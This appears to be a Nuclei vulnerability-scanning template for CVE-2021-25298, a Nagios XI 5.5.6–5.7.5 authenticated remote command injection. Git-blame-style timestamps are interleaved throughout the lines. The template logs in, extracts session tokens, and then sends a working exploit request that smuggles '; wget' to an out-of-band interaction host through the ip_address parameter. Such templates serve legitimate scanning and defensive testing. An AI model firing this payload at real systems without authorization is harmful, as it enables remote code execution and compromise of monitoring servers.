2023-01-24 18:04:11 +00:00
id : CVE-2021-25298
2023-01-24 13:53:40 +00:00
2023-01-24 18:04:11 +00:00
info :
2023-03-27 17:46:47 +00:00
name : Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
2023-01-24 18:04:11 +00:00
author : k0pak4
2023-02-22 12:07:21 +00:00
severity : high
description : |
2023-03-27 17:46:47 +00:00
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-01-24 18:04:11 +00:00
reference :
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
- https://github.com/rapid7/metasploit-framework/pull/17494
2023-02-23 10:12:47 +00:00
- http://nagios.com
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25298
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
2023-01-24 18:04:11 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2021-25298
cwe-id : CWE-78
2023-07-11 19:49:27 +00:00
epss-score : 0.97375
cpe : cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
2023-02-22 12:07:21 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 4
2023-02-22 12:07:21 +00:00
shodan-query : title:"Nagios XI"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : nagios
product : nagios_xi
2023-02-23 10:12:47 +00:00
tags : oast,authenticated,msf,cve,cve2021,nagiosxi,rce,kev
2023-01-24 18:04:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-28 15:16:06 +00:00
- raw :
- |
GET /nagiosxi/login.php HTTP/1.1
Host : {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-01-30 12:48:21 +00:00
2023-02-22 13:31:52 +00:00
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
2023-01-28 15:16:06 +00:00
- |
2023-01-30 12:48:21 +00:00
GET /nagiosxi/index.php HTTP/1.1
2023-01-28 15:16:06 +00:00
Host : {{Hostname}}
2023-01-30 12:48:21 +00:00
- |
2023-02-23 07:48:53 +00:00
@timeout : 20s
2023-02-22 20:51:51 +00:00
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1
2023-01-30 12:48:21 +00:00
Host : {{Hostname}}
2023-01-28 15:16:06 +00:00
2023-02-22 12:07:21 +00:00
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2023-01-28 15:16:06 +00:00
matchers-condition : and
2023-01-30 13:11:15 +00:00
matchers :
2023-02-22 12:07:21 +00:00
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
- type : word
part : body_4
words :
- "Connection Information"
- "Host Check"
condition : and
2023-01-28 15:16:06 +00:00
2023-01-30 12:51:14 +00:00
- type : status
status :
- 200
2023-01-28 15:16:06 +00:00
extractors :
- type : regex
2023-02-22 12:07:21 +00:00
name : nsp
2023-01-28 15:16:06 +00:00
group : 1
regex :
2023-02-22 12:07:21 +00:00
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
2023-01-30 12:48:21 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-01-30 12:48:21 +00:00
- type : regex
2023-02-22 12:07:21 +00:00
name : nsp_auth
2023-01-30 12:48:21 +00:00
group : 1
regex :
2023-02-22 12:07:21 +00:00
- "var nsp_str = ['\"](.*)['\"];"
2023-01-30 12:48:21 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body